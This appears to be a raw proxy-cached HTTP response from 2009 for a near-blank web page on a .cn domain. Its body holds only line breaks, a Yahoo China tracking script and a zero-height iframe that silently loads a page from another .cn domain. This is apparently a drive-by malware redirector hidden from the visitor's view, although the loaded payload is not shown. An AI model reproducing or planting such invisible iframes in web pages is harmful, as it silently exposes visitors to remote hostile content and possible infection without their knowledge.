HTTP/1.1 200 OK
Content-Length: 332
ETag: "2226ecd7a096c91:41f"
Date: Wed, 25 Feb 2009 08:53:12 GMT
Last-Modified: Tue, 24 Feb 2009 16:56:31 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://q.fgjg2.cn/ddsl/1.htm
X-Polipo-Date: Wed, 25 Feb 2009 09:03:28 GMT
X-Polipo-Access: Wed, 25 Feb 2009 09:03:28 GMT

 <br>
<br>
<br>
<iframe src=http://z.fghf9.cn/d5/fxx.htm width=100 height=0></Iframe>
<br>
<br>
<br>
<br>

<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/835667/ystat.js"></script><noscript><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/835667/ystat.gif"/></a></noscript>
